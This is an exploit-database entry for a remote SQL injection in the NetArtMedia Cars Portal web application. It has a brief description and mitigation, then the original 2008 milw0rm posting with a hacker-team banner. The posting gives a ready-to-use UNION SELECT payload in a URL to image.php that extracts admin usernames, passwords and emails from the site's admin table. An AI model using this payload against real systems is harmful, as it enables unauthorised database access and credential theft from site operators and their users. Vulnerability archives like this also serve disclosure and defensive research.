NetArtMedia Cars Portal Remote SQL Injection Vulnerability

vendor:

Cars Portal

by:

Snakespc

CVSS

HIGH

SQL Injection

CWE

Product Name: Cars Portal

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

NetArtMedia Cars Portal Remote SQL Injection Vulnerability

NetArtMedia Cars Portal is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow an attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.

Source

Exploit-DB raw data:

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
                                                                                       
                             Script: NetArtMedia Cars Portal Remote SQL Injection Vulnerability                                   
                                                                                                              
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =       =                 :::::Mail: snakespc@gmail.com:::::::             =         =
                =                                                                                    =
                =           Sript : http://www.netartmedia.net/carsportal/                 =
                =                               www.netartmedia.net                                  =              
                 =================================== Snakespc ======================================    


[*]Exploit:
Using FireFox
view-source:http://localhost/[script_path]/image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6 FROM websiteadmin_admin_users--
                                                                   
===================================================================================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
ALL www.Snakespc.com/sc >>>> Members 
str0ke.....>>>>.....milw0rm
===================================================================================================================

# milw0rm.com [2008-11-23]